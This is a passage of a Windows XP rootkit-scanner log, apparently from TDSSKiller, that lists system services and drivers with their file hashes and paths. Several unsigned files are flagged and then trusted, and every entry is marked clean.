13:18:22.0375 0x020c  [ D86A39BF100069444D026D22D9A6E555, 7B24D48D5BA67704C88697FADB64364E0E64D26259408E3C219820C5404C5EEC ] hpqddsvc        C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll
13:18:22.0390 0x020c  hpqddsvc - ok
13:18:22.0437 0x020c  [ A04F4AC48895774A2CF9D1C9EAAACEF0, 012F10DE086C3551D75716EF1F6DCC477C8C1E776267D9FC4073BEADAFD37C9C ] HPSLPSVC        C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL
13:18:22.0468 0x020c  HPSLPSVC - ok
13:18:22.0515 0x020c  [ D03D10F7DED688FECF50F8FBF1EA9B8A, C19A733571BA831E24EE45EDB730FFFDBA22638F138A32A794BEAB8D8B71D8DD ] HPZid412        C:\WINDOWS\system32\DRIVERS\HPZid412.sys
13:18:22.0562 0x020c  HPZid412 - ok
13:18:22.0578 0x020c  [ 89F41658929393487B6B7D13C8528CE3, 5D06A11225A83F3F33417148BE53654080C88BFA876FEB486A7E43410AC99F23 ] HPZipr12        C:\WINDOWS\system32\DRIVERS\HPZipr12.sys
13:18:22.0625 0x020c  HPZipr12 - ok
13:18:22.0656 0x020c  [ ABCB05CCDBF03000354B9553820E39F8, 6361B5A57CDE23AC5E987ACECF3BEE7AD51134C6E5BF4F833E512C9BC4B86877 ] HPZius12        C:\WINDOWS\system32\DRIVERS\HPZius12.sys
13:18:22.0703 0x020c  HPZius12 - ok
13:18:22.0750 0x020c  [ F80A415EF82CD06FFAF0D971528EAD38, 524D9E9201572929522F6805011783711B7C0F76308B924C89CF75F4B7A1FDF3 ] HTTP            C:\WINDOWS\system32\Drivers\HTTP.sys
13:18:22.0781 0x020c  HTTP - ok
13:18:22.0828 0x020c  [ 6100A808600F44D999CEBDEF8841C7A3, 61A75118C327812C60622010985A2E80E79B6FD9030A5732390EE5426E4AF6C9 ] HTTPFilter      C:\WINDOWS\System32\w3ssl.dll
13:18:23.0000 0x020c  HTTPFilter - ok
13:18:23.0000 0x020c  i2omp - ok
13:18:23.0015 0x020c  [ 4A0B06AA8943C1E332520F7440C0AA30, DB2452390CCFE67E0C5FEB4FD42CA24ABE2DDD40D0B22DD5F5B8F70416863918 ] i8042prt        C:\WINDOWS\system32\DRIVERS\i8042prt.sys
13:18:23.0156 0x020c  i8042prt - ok
13:18:23.0250 0x020c  [ 88164BA0E3FC4172FF3A1BD82B756454, 678A6C5FD8254993D5ACDECAB24EF84E8C00875E8E310CA962EEB993C573906D ] ialm            C:\WINDOWS\system32\DRIVERS\igxpmp32.sys
13:18:23.0296 0x020c  ialm - ok
13:18:23.0343 0x020c  [ 6F95324909B502E2651442C1548AB12F, FF1B104990FE186C6100ED229A45345FF695323AC778688EC11AA8F5A87B141E ] IDriverT        C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
13:18:23.0359 0x020c  IDriverT - detected UnsignedFile.Multi.Generic ( 1 )
13:18:23.0359 0x020c  Detect skipped due to KSN trusted
13:18:23.0359 0x020c  IDriverT - ok
13:18:23.0437 0x020c  [ C01AC32DC5C03076CFB852CB5DA5229C, A4D7749220B5BC965D96A267F1E02FE8284A230BA249109207BD4B9EA8DFAC96 ] idsvc           C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
13:18:23.0484 0x020c  idsvc - ok
13:18:23.0500 0x020c  [ 083A052659F5310DD8B6A6CB05EDCF8E, 48D39B03FFB6FAA1529B774443BA12618AE3982D9F65A7B9D18F2269F78B31F4 ] Imapi           C:\WINDOWS\system32\DRIVERS\imapi.sys
13:18:23.0640 0x020c  Imapi - ok
13:18:23.0687 0x020c  [ 30DEAF54A9755BB8546168CFE8A6B5E1, 3936228CD3125C763ABFCB93E86E4B43838202BCC0913A28E84AC0263B43EE0D ] ImapiService    C:\WINDOWS\system32\imapi.exe
13:18:23.0843 0x020c  ImapiService - ok
13:18:23.0859 0x020c  ini910u - ok
13:18:24.0062 0x020c  [ FA9A9468F982835E99C1EC21257F7E60, 0A31307CDF8833FD9378B297F6860B36AF5FB535816145AAC8B9C907AECF4B17 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys
13:18:24.0312 0x020c  IntcAzAudAddService - ok
13:18:24.0359 0x020c  [ 8C953733D8F36EB2133F5BB58808B66B, 555868F246D73652E998B0B1296476E42FCEDED30D646CC000F31ECE4EBC25E6 ] intelppm        C:\WINDOWS\system32\DRIVERS\intelppm.sys
13:18:24.0500 0x020c  intelppm - ok
13:18:24.0578 0x020c  [ 1663A135865F0BA6E853353E98E67F2A, 700D383F964EBF38D9B66A6C7966700F0DBE7C7AF77AAE2F67AF703E36C8116B ] IntuitUpdateServiceV4 C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
13:18:24.0593 0x020c  IntuitUpdateServiceV4 - ok
13:18:24.0625 0x020c  [ 3BB22519A194418D5FEC05D800A19AD0, F6662F440950596DC1382DD1DB5D7891CCEA30A6062BEA942C18445B5F0D8B16 ] Ip6Fw           C:\WINDOWS\system32\drivers\ip6fw.sys
13:18:24.0796 0x020c  Ip6Fw - ok
13:18:24.0828 0x020c  [ 731F22BA402EE4B62748ADAF6363C182, 5C3BEBD008A5BE4DC2F92076FF41A10DDC01E10EC7E6552213CFA11970811848 ] IpFilterDriver  C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
13:18:24.0968 0x020c  IpFilterDriver - ok
13:18:25.0000 0x020c  [ B87AB476DCF76E72010632B5550955F5, E6E74D3A86A7917A8BAED44F8E97CCD2EB171E4E4B27E9907F60D1523FAF319A ] IpInIp          C:\WINDOWS\system32\DRIVERS\ipinip.sys
13:18:25.0125 0x020c  IpInIp - ok
13:18:25.0156 0x020c  [ CC748EA12C6EFFDE940EE98098BF96BB, AF523E21C25D9A1715EFEA573E4F52AF5D4FC9F28A2D613F5DB629C186C439E0 ] IpNat           C:\WINDOWS\system32\DRIVERS\ipnat.sys
13:18:25.0296 0x020c  IpNat - ok
13:18:25.0359 0x020c  [ BC0EA61246F8D940FBC5F652D337D6BD, BF018317631937EED13136608831F526BE34AF7E59FEF4863E3EDD205C02E1A7 ] iPod Service    C:\Program Files\iPod\bin\iPodService.exe
13:18:25.0406 0x020c  iPod Service - ok
13:18:25.0421 0x020c  [ 23C74D75E36E7158768DD63D92789A91, 394D296F38E7D8EFD91A6EEC301D9CE6AF910E35EB9819F1A9E3363863AEDFDC ] IPSec           C:\WINDOWS\system32\DRIVERS\ipsec.sys
13:18:25.0562 0x020c  IPSec - ok
13:18:25.0593 0x020c  [ C93C9FF7B04D772627A3646D89F7BF89, 805FA48E7A46D4F10240BF880A2468F53DEA36E83004399228AB70DB7D20544A ] IRENUM          C:\WINDOWS\system32\DRIVERS\irenum.sys
13:18:25.0734 0x020c  IRENUM - ok
13:18:25.0750 0x020c  [ 05A299EC56E52649B1CF2FC52D20F2D7, 2654619DB3E6D6C385B63AB02F87D4241C4F0250CC31383D1B3586917166C2DC ] isapnp          C:\WINDOWS\system32\DRIVERS\isapnp.sys
13:18:25.0890 0x020c  isapnp - ok
13:18:26.0000 0x020c  [ 9ECF00E19736054E019C532AED8228FC, F5A64A8269EA3655BBD4850298F335C0BD30535258928ED7CE62A32A3363E60B ] JavaQuickStarterService C:\Program Files\Java\jre7\bin\jqs.exe
13:18:26.0015 0x020c  JavaQuickStarterService - ok
13:18:26.0031 0x020c  [ 463C1EC80CD17420A542B7F36A36F128, E3B11BA26AFEAFB50B0FC168EA07F6049DA6B88BCDDEEE20310602D7FC27A3A7 ] Kbdclass        C:\WINDOWS\system32\DRIVERS\kbdclass.sys
13:18:26.0171 0x020c  Kbdclass - ok
13:18:26.0203 0x020c  [ 692BCF44383D056AED41B045A323D378, 1A99DEE83FFAF64E73067FC049C0A4CE07D94E4AE31EFA17B38CEFA9E41D67DC ] kmixer          C:\WINDOWS\system32\drivers\kmixer.sys
13:18:26.0359 0x020c  kmixer - ok
13:18:26.0375 0x020c  [ B467646C54CC746128904E1654C750C1, 3BD71BE3663EA23463D236D8A2A2E42DFA10C502BDB4B6E131FAF0FBA748219E ] KSecDD          C:\WINDOWS\system32\drivers\KSecDD.sys
13:18:26.0406 0x020c  KSecDD - ok
13:18:26.0437 0x020c  [ 3A7C3CBE5D96B8AE96CE81F0B22FB527, 0044F03132596A494448CCE5F3D6ECC12617BB4CF6BAE348F79D4DC40ACD6EE0 ] lanmanserver    C:\WINDOWS\System32\srvsvc.dll
13:18:26.0468 0x020c  lanmanserver - ok
13:18:26.0515 0x020c  [ A8888A5327621856C0CEC4E385F69309, B08B63300D824E35E31EEEA2C4C086DFA2C2A964CEDAE512E74D3D88AADAA2C1 ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll
13:18:26.0531 0x020c  lanmanworkstation - ok
13:18:26.0578 0x020c  [ A7DB739AE99A796D91580147E919CC59, EDF4E039BA277B0E6D66FEB0B28096E67D682C09DFC18ECECF062D9DCFB75ACF ] LmHosts         C:\WINDOWS\System32\lmhsvc.dll
13:18:26.0750 0x020c  LmHosts - ok
13:18:26.0765 0x020c  [ 986B1FF5814366D71E0AC5755C88F2D3, E6AF051174531C24B38E73987755D366ABEC595476C6D17793E8DCCC73F55340 ] Messenger       C:\WINDOWS\System32\msgsvc.dll
13:18:26.0890 0x020c  Messenger - ok
13:18:26.0906 0x020c  [ 4AE068242760A1FB6E1A44BF4E16AFA6, 1FB771162B96AAF787AC24867B818DF8511F0780BB094FA9A38C11D8DBFE68BC ] mnmdd           C:\WINDOWS\system32\drivers\mnmdd.sys
13:18:27.0031 0x020c  mnmdd - ok
13:18:27.0062 0x020c  [ D18F1F0C101D06A1C1ADF26EED16FCDD, BA0837C7780BD8262E143E2935AFA63BE59C3C39EF56CB8608EED0F50AF070D4 ] mnmsrvc         C:\WINDOWS\system32\mnmsrvc.exe
13:18:27.0203 0x020c  mnmsrvc - ok
13:18:27.0234 0x020c  [ DFCBAD3CEC1C5F964962AE10E0BCC8E1, B342CC9EC3729AB1AB4B5E2E99F890C1E0CA649162DE91F6768AB857B719E97B ] Modem           C:\WINDOWS\system32\drivers\Modem.sys
13:18:27.0359 0x020c  Modem - ok
13:18:27.0406 0x020c  [ 35C9E97194C8CFB8430125F8DBC34D04, 0C0FCE6B0A23FB0ECB92E1663E1C72D2DD5B177D82E04782957690B69530DB39 ] Mouclass        C:\WINDOWS\system32\DRIVERS\mouclass.sys
13:18:27.0562 0x020c  Mouclass - ok
13:18:27.0593 0x020c  [ B1C303E17FB9D46E87A98E4BA6769685, 161A45488522055D0F0474ABEDA04DDD0B5DAC2411AF9154B15190BBD66E7153 ] mouhid          C:\WINDOWS\system32\DRIVERS\mouhid.sys
13:18:27.0734 0x020c  mouhid - ok
13:18:27.0750 0x020c  [ A80B9A0BAD1B73637DBCBBA7DF72D3FD, 2A5E15ED2C24C6C65EF2F7E1FD93374774076C9D8D451E4422561F4D269C012F ] MountMgr        C:\WINDOWS\system32\drivers\MountMgr.sys
13:18:27.0906 0x020c  MountMgr - ok
13:18:27.0953 0x020c  [ FD5E45969B82B83E33CB05B5C9B0E3F2, A6C21F7A0A97683DA50FC102131618CC1BE5CA0C3625D2FDAF5861B9B6523E45 ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
13:18:27.0984 0x020c  MozillaMaintenance - detected UnsignedFile.Multi.Generic ( 1 )
13:18:27.0984 0x020c  Detect skipped due to KSN trusted
13:18:27.0984 0x020c  MozillaMaintenance - ok
13:18:28.0000 0x020c  mraid35x - ok
13:18:28.0031 0x020c  [ 11D42BB6206F33FBB3BA0288D3EF81BD, 76ABCFB62C5AC549F58C231F72A99882CDEB74928104B77FE52554765C2B1A22 ] MRxDAV          C:\WINDOWS\system32\DRIVERS\mrxdav.sys
13:18:28.0187 0x020c  MRxDAV - ok
13:18:28.0218 0x020c  [ A137F1470499A205ABBB9AAFB3B6F2B1, FB4951727543030D9E6ED74149C3FAACE2CA9DA8C1B5F616301B30B858C724E8 ] MSDTC           C:\WINDOWS\system32\msdtc.exe
13:18:28.0343 0x020c  MSDTC - ok
13:18:28.0390 0x020c  [ C941EA2454BA8350021D774DAF0F1027, C940E978C7B66A713A0FDAB54B5F995DF59D089AFCD96221DD3222948CD49BBD ] Msfs            C:\WINDOWS\system32\drivers\Msfs.sys
13:18:28.0578 0x020c  Msfs - ok
13:18:28.0593 0x020c  MSIServer - ok
13:18:28.0609 0x020c  [ D1575E71568F4D9E14CA56B7B0453BF1, 4ABE0E24786C0D39FA2B885447E56204CA6942FB175E534DCE675D7BCF0B176A ] MSKSSRV         C:\WINDOWS\system32\drivers\MSKSSRV.sys
13:18:28.0750 0x020c  MSKSSRV - ok
13:18:28.0750 0x020c  [ 325BB26842FC7CCC1FCCE2C457317F3E, C07BE560513B1FB91D756494F0BA4AEEB2E1998DE0E1C21EE83DB1183B0CEE91 ] MSPCLOCK        C:\WINDOWS\system32\drivers\MSPCLOCK.sys
13:18:28.0890 0x020c  MSPCLOCK - ok
13:18:28.0890 0x020c  [ BAD59648BA099DA4A17680B39730CB3D, 9AD4C7C94C186C8815D0BC75DCAFB962158DA6935A244BA243EDDDEB33F9816C ] MSPQM           C:\WINDOWS\system32\drivers\MSPQM.sys
13:18:29.0031 0x020c  MSPQM - ok
13:18:29.0078 0x020c  [ AF5F4F3F14A8EA2C26DE30F7A1E17136, AC93A1E4ABB0D038B772E429015567E44CC2EDB66C54DBE23A5F98176FAC1520 ] mssmbios        C:\WINDOWS\system32\DRIVERS\mssmbios.sys
13:18:29.0203 0x020c  mssmbios - ok
13:18:29.0250 0x020c  [ DE6A75F5C270E756C5508D94B6CF68F5, FCC972DDC36C2C44D836913F10004C2C33B11C54DEFFF0C63E0FDF901D2F9261 ] Mup             C:\WINDOWS\system32\drivers\Mup.sys
13:18:29.0265 0x020c  Mup - ok
13:18:29.0312 0x020c  [ 0102140028FAD045756796E1C685D695, 5335B8278418CA200E2772124F0602C3E15A5CAF2D5CC59F6785DFAABF339B09 ] napagent        C:\WINDOWS\System32\qagentrt.dll
13:18:29.0468 0x020c  napagent - ok
13:18:29.0500 0x020c  [ 1DF7F42665C94B825322FAE71721130D, FE0DCB728471465B39A42A7511F4133021FBA5DF88F88BCB5FE2FF34CFD713F9 ] NDIS            C:\WINDOWS\system32\drivers\NDIS.sys
13:18:29.0640 0x020c  NDIS - ok
13:18:29.0671 0x020c  [ 0109C4F3850DFBAB279542515386AE22, 4F6DB1E499AC853FD36FD603FBB6D3AC9BDCEB298C7FE1FB59A9236CB46729B2 ] NdisTapi        C:\WINDOWS\system32\DRIVERS\ndistapi.sys
13:18:29.0687 0x020c  NdisTapi - ok
13:18:29.0718 0x020c  [ F927A4434C5028758A842943EF1A3849, B1AA3AF150C05307461774925901789456B0CCCD03A5E71ADA4AB58455962BEE ] Ndisuio         C:\WINDOWS\system32\DRIVERS\ndisuio.sys
13:18:29.0859 0x020c  Ndisuio - ok
13:18:29.0875 0x020c  [ EDC1531A49C80614B2CFDA43CA8659AB, 494042F790F33721328B4451E79842E21919681CC421A4F9633EC4D383E06097 ] NdisWan         C:\WINDOWS\system32\DRIVERS\ndiswan.sys
13:18:30.0031 0x020c  NdisWan - ok
13:18:30.0046 0x020c  [ 2F597BB467E05B1FE3830EABD821B8E0, 141497F5A49D47CCE3C9289644F4BD838DCB238F6D8E847FC006652E21FE02AC ] NDProxy         C:\WINDOWS\system32\drivers\NDProxy.sys
13:18:30.0062 0x020c  NDProxy - ok
13:18:30.0093 0x020c  [ A081CB6FB9A12668F233EB5414BE3A0E, EE2A1311B51D1FEBAF79F45E568A927D8EA7704AFC8495AED2D26927566F61E3 ] Net Driver HPZ12 C:\WINDOWS\system32\HPZinw12.dll
13:18:30.0109 0x020c  Net Driver HPZ12 - detected UnsignedFile.Multi.Generic ( 1 )
13:18:30.0109 0x020c  Detect skipped due to KSN trusted
13:18:30.0109 0x020c  Net Driver HPZ12 - ok
13:18:30.0125 0x020c  [ 5D81CF9A2F1A3A756B66CF684911CDF0, 7989C36607CAEA17AFA2C1C9904145CA0714A54B9F712D9D4C1AB140D0B2CC0C ] NetBIOS         C:\WINDOWS\system32\DRIVERS\netbios.sys
13:18:30.0250 0x020c  NetBIOS - ok
13:18:30.0281 0x020c  [ 74B2B2F5BEA5E9A3DC021D685551BD3D, 7932B71F98B4122BE88F576BF6D745A757AE378A48924B7F4358837B75640A82 ] NetBT           C:\WINDOWS\system32\DRIVERS\netbt.sys
13:18:30.0437 0x020c  NetBT - ok
13:18:30.0484 0x020c  [ B857BA82860D7FF85AE29B095645563B, 86FF0E4CDD9C394E8BABD93A4D57E73FF9A779261717DEC6E9CDE99F1C6B0F4C ] NetDDE          C:\WINDOWS\system32\netdde.exe
13:18:30.0609 0x020c  NetDDE - ok
13:18:30.0625 0x020c  [ B857BA82860D7FF85AE29B095645563B, 86FF0E4CDD9C394E8BABD93A4D57E73FF9A779261717DEC6E9CDE99F1C6B0F4C ] NetDDEdsdm      C:\WINDOWS\system32\netdde.exe
13:18:30.0750 0x020c  NetDDEdsdm - ok
13:18:30.0796 0x020c  [ A4ABB21D13528D1BA3ABF484B2DF24FE, 2DC5CFB023D990FD5680859660108EA80FB320A882C5B4BBAA3A061D7C870F46 ] netfilter       C:\WINDOWS\system32\drivers\netfilter.sys
13:18:30.0812 0x020c  netfilter - detected UnsignedFile.Multi.Generic ( 1 )
13:18:30.0812 0x020c  Detect skipped due to KSN trusted
13:18:30.0812 0x020c  netfilter - ok
13:18:30.0843 0x020c  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] Netlogon        C:\WINDOWS\system32\lsass.exe
13:18:30.0984 0x020c  Netlogon - ok
13:18:31.0000 0x020c  [ 13E67B55B3ABD7BF3FE7AAE5A0F9A9DE, 4E0A67B3CC897E80D4B342FFE8B7B4CC4F6CA2EF2D34C136027A098B2E1C6166 ] Netman          C:\WINDOWS\System32\netman.dll
13:18:31.0156 0x020c  Netman - ok
13:18:31.0203 0x020c  [ D34612C5D02D026535B3095D620626AE, 1BBCCCBF49EB8807240A77DCB43C25C21682073CC5356594E2C4F53EF36BF657 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
13:18:31.0218 0x020c  NetTcpPortSharing - ok
13:18:31.0265 0x020c  [ E9E47CFB2D461FA0FC75B7A74C6383EA, 544136F5BFD4DC23D45E90F12FA48B82FD9EAEA9EAF3E0F5F0BD27E23D672C3E ] NIC1394         C:\WINDOWS\system32\DRIVERS\nic1394.sys
13:18:31.0406 0x020c  NIC1394 - ok
13:18:31.0437 0x020c  [ 943337D786A56729263071623BBB9DE5, B631B47C869FE4ACF46E4AA272435D9A9CA536E3349E3FFBB8602636FEE7AFD4 ] Nla             C:\WINDOWS\System32\mswsock.dll
13:18:31.0453 0x020c  Nla - ok
13:18:31.0468 0x020c  [ 3182D64AE053D6FB034F44B6DEF8034A, 4ADFC76965BA2A5F488E71789A4E4EA702A74AF42725F72130D1CA919406CF19 ] Npfs            C:\WINDOWS\system32\drivers\Npfs.sys
13:18:31.0609 0x020c  Npfs - ok
13:18:31.0656 0x020c  [ 78A08DD6A8D65E697C18E1DB01C5CDCA, E0E6F3ED05068E32F1D5C2D2B38CDEF4536B8656DB6756C66CF6B40B60C8F3DA ] Ntfs            C:\WINDOWS\system32\drivers\Ntfs.sys
13:18:31.0828 0x020c  Ntfs - ok
13:18:31.0859 0x020c  [ 7F1C1F78D709C4A54CBB46EDE7E0B48D, 52135D41983A9E9E1DCA250A63017076AE22AA06D77CCF2E5EF41154F958584A ] NTIDrvr         C:\WINDOWS\system32\DRIVERS\NTIDrvr.sys
13:18:31.0875 0x020c  NTIDrvr - detected UnsignedFile.Multi.Generic ( 1 )
13:18:31.0875 0x020c  Detect skipped due to KSN trusted
13:18:31.0875 0x020c  NTIDrvr - ok
13:18:31.0890 0x020c  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] NtLmSsp         C:\WINDOWS\system32\lsass.exe
13:18:32.0015 0x020c  NtLmSsp - ok
13:18:32.0062 0x020c  [ 156F64A3345BD23C600655FB4D10BC08, 9611BE411586E068D9297D77102DB3BE48AA67F1BAD6F61A84F83FC3043FA9CD ] NtmsSvc         C:\WINDOWS\system32\ntmssvc.dll
13:18:32.0234 0x020c  NtmsSvc - ok
13:18:32.0250 0x020c  [ 73C1E1F395918BC2C6DD67AF7591A3AD, B21133A75253EC15E2DFF66D3B480AB1A7E1A2360476C810E7AA55D0F0EB08D4 ] Null            C:\WINDOWS\system32\drivers\Null.sys
13:18:32.0375 0x020c  Null - ok
13:18:32.0390 0x020c  [ B305F3FAD35083837EF46A0BBCE2FC57, 9D0E0E666D652D0FC9EAB97280A5D67AAF61D6B21929DF7CF8ED72A367720464 ] NwlnkFlt        C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
13:18:32.0531 0x020c  NwlnkFlt - ok
13:18:32.0546 0x020c  [ C99B3415198D1AAB7227F2C88FD664B9, DD8DA4B5E804F134AB9233859544C025062902DFC3E8FB8A09A67337A4E73F55 ] NwlnkFwd        C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
13:18:32.0687 0x020c  NwlnkFwd - ok
13:18:32.0796 0x020c  [ 785F487A64950F3CB8E9F16253BA3B7B, 02445344BD214370A6D48B1CA04921D8EFCB13E676B5648266DD0E076C0822B6 ] odserv          C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
13:18:32.0828 0x020c  odserv - ok
13:18:32.0875 0x020c  [ CA33832DF41AFB202EE7AEB05145922F, 9DD0089C2E13C7F81214C3B5A4A61276292052F9BBFEA7FCD0F6AA27815D5F95 ] ohci1394        C:\WINDOWS\system32\DRIVERS\ohci1394.sys
13:18:33.0015 0x020c  ohci1394 - ok
13:18:33.0046 0x020c  [ 5A432A042DAE460ABE7199B758E8606C, 6E5D1F477D290905BE27CEBF9572BAC6B05FFEF2FAD901D3C8E11F665F8B9A71 ] ose             C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
13:18:33.0062 0x020c  ose - ok
13:18:33.0093 0x020c  [ 5575FAF8F97CE5E713D108C2A58D7C7C, 96D4595D19A78CCBE8B325A08780AC077AE5CC99642ACD72FB47AEAE8D344D3B ] Parport         C:\WINDOWS\system32\DRIVERS\parport.sys
13:18:33.0234 0x020c  Parport - ok
13:18:33.0265 0x020c  [ BEB3BA25197665D82EC7065B724171C6, 7E71C13BA30CD95CEE8A9CC85E6F48A01F30EDEAADEE69D80AE828BF97E5A5CA ] PartMgr         C:\WINDOWS\system32\drivers\PartMgr.sys
13:18:33.0437 0x020c  PartMgr - ok
13:18:33.0468 0x020c  [ 70E98B3FD8E963A6A46A2E6247E0BEA1, 6771313EC41B3B5BFD398F60706E40BE71617046880CC352DD110B001AFC22A1 ] ParVdm          C:\WINDOWS\system32\drivers\ParVdm.sys
13:18:33.0609 0x020c  ParVdm - ok
13:18:33.0625 0x020c  [ A219903CCF74233761D92BEF471A07B1, D4E6C360A1D2FCA4D17C991B834D68BF20F5111DD06B1FAB8B22984804CEC269 ] PCI             C:\WINDOWS\system32\DRIVERS\pci.sys
13:18:33.0765 0x020c  PCI - ok
13:18:33.0796 0x020c  [ CCF5F451BB1A5A2A522A76E670000FF0, D63F7E5A39653EC9CCE94B7D84B2D3EBD4F54533BD65701020198724042C9257 ] PCIIde          C:\WINDOWS\system32\DRIVERS\pciide.sys
13:18:33.0937 0x020c  PCIIde - ok
13:18:33.0968 0x020c  [ 9E89EF60E9EE05E3F2EEF2DA7397F1C1, 0BA3DB21DC7C641C181E2635B5C9B73965FDCDCD3EBBBE48FCFEC1C8C987F617 ] Pcmcia          C:\WINDOWS\system32\drivers\Pcmcia.sys
13:18:34.0109 0x020c  Pcmcia - ok
13:18:34.0125 0x020c  perc2 - ok
13:18:34.0125 0x020c  perc2hib - ok
13:18:34.0171 0x020c  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] PlugPlay        C:\WINDOWS\system32\services.exe
13:18:34.0187 0x020c  PlugPlay - ok
13:18:34.0234 0x020c  [ 65BC271F337637731D3C71455AE1F476, DAD32B61FE0147F8D2DA4C8F016920CD6BB2098F16E3CC2768009763E71DEFBC ] Pml Driver HPZ12 C:\WINDOWS\system32\HPZipm12.dll
13:18:34.0250 0x020c  Pml Driver HPZ12 - detected UnsignedFile.Multi.Generic ( 1 )
13:18:34.0250 0x020c  Detect skipped due to KSN trusted
13:18:34.0250 0x020c  Pml Driver HPZ12 - ok
13:18:34.0281 0x020c  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] PolicyAgent     C:\WINDOWS\system32\lsass.exe
13:18:34.0421 0x020c  PolicyAgent - ok
13:18:34.0468 0x020c  [ EFEEC01B1D3CF84F16DDD24D9D9D8F99, C5F0C8C66A3AF7E7BB04CEDE4AC5306F8387AB384A2107DC5BE413AAE968EFF1 ] PptpMiniport    C:\WINDOWS\system32\DRIVERS\raspptp.sys
13:18:34.0640 0x020c  PptpMiniport - ok
13:18:34.0640 0x020c  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] ProtectedStorage C:\WINDOWS\system32\lsass.exe
13:18:34.0796 0x020c  ProtectedStorage - ok
13:18:34.0796 0x020c  [ 09298EC810B07E5D582CB3A3F9255424, 35473A1BE25AC289474090EB0806AC6B3035DC33D1F3DF97A14BF1E361AC6AC3 ] PSched          C:\WINDOWS\system32\DRIVERS\psched.sys
13:18:34.0937 0x020c  PSched - ok
13:18:34.0968 0x020c  [ 00B670D8A36C7134CFC66B446A18CC92, 4D9DAEE5C9AED4AC6622AB8EFA634FE1E525B604604B5D655533DB4579964B62 ] psdfilter       C:\WINDOWS\system32\Drivers\psdfilter.sys
13:18:34.0984 0x020c  psdfilter - detected UnsignedFile.Multi.Generic ( 1 )
13:18:34.0984 0x020c  Detect skipped due to KSN trusted
13:18:34.0984 0x020c  psdfilter - ok
13:18:35.0000 0x020c  [ E9A60343CB7C39090638B1DD574F26EB, 52632F9E16C3B2BDF054D6AFB9BFF0FCD81F399669819C092D95128ED4D14BE0 ] psdvdisk        C:\WINDOWS\system32\Drivers\psdvdisk.sys
13:18:35.0015 0x020c  psdvdisk - detected UnsignedFile.Multi.Generic ( 1 )
13:18:35.0015 0x020c  Detect skipped due to KSN trusted
13:18:35.0015 0x020c  psdvdisk - ok
13:18:35.0046 0x020c  [ 80D317BD1C3DBC5D4FE7B1678C60CADD, DA76804B55D0CAB3DDD01EFC06673764AE4860693375C658B6063FB14AF7F12C ] Ptilink         C:\WINDOWS\system32\DRIVERS\ptilink.sys
13:18:35.0171 0x020c  Ptilink - ok
13:18:35.0187 0x020c  ql1080 - ok
13:18:35.0187 0x020c  Ql10wnt - ok
13:18:35.0203 0x020c  ql12160 - ok
13:18:35.0203 0x020c  ql1240 - ok
13:18:35.0218 0x020c  ql1280 - ok
13:18:35.0234 0x020c  [ FE0D99D6F31E4FAD8159F690D68DED9C, 998685622ABE631984B7E4DBF91AB3594B1F574378D75EB9F6265F4650470692 ] RasAcd          C:\WINDOWS\system32\DRIVERS\rasacd.sys
13:18:35.0359 0x020c  RasAcd - ok
13:18:35.0390 0x020c  [ AD188BE7BDF94E8DF4CA0A55C00A5073, C7D76CB579FAEBCCC2873499441BACDD6BD6668ACF5ED7F31862656E96E2B20C ] RasAuto         C:\WINDOWS\System32\rasauto.dll
13:18:35.0546 0x020c  RasAuto - ok
13:18:35.0562 0x020c  [ 11B4A627BC9614B885C4969BFA5FF8A6, EAE0A412A2B0F68919C32A96B3A08CC1A06585E4998819F5C9051745F63FF5AD ] Rasl2tp         C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
13:18:35.0687 0x020c  Rasl2tp - ok
13:18:35.0734 0x020c  [ 76A9A3CBEADD68CC57CDA5E1D7448235, 4AFD048C5D2306AB8DE46F3AA60AC0213333DDA3B09A9E91F7585DB6EB978EC8 ] RasMan          C:\WINDOWS\System32\rasmans.dll
13:18:35.0875 0x020c  RasMan - ok
13:18:35.0875 0x020c  [ 5BC962F2654137C9909C3D4603587DEE, A5CE5653D0105240F5E86CFAAB89E7917D42D939E2F27A5A7D6979289CA651B8 ] RasPppoe        C:\WINDOWS\system32\DRIVERS\raspppoe.sys
13:18:36.0015 0x020c  RasPppoe - ok
13:18:36.0046 0x020c  [ FDBB1D60066FCFBB7452FD8F9829B242, 10A2DACF944BD000032EBA8C095CB3D879CC55B28C377ADF6E52E508E47444DB ] Raspti          C:\WINDOWS\system32\DRIVERS\raspti.sys
13:18:36.0187 0x020c  Raspti - ok
13:18:36.0234 0x020c  [ 7AD224AD1A1437FE28D89CF22B17780A, 6645235CA27D671954E3557FA37082881C3D7D47492C71264CD8CB8D108EC801 ] Rdbss           C:\WINDOWS\system32\DRIVERS\rdbss.sys
13:18:36.0390 0x020c  Rdbss - ok
13:18:36.0390 0x020c  [ 4912D5B403614CE99C28420F75353332, 975341ECD660209987B5E5171B8315E032439E408CBE8A5986E67AF767F373BB ] RDPCDD          C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
13:18:36.0578 0x020c  RDPCDD - ok
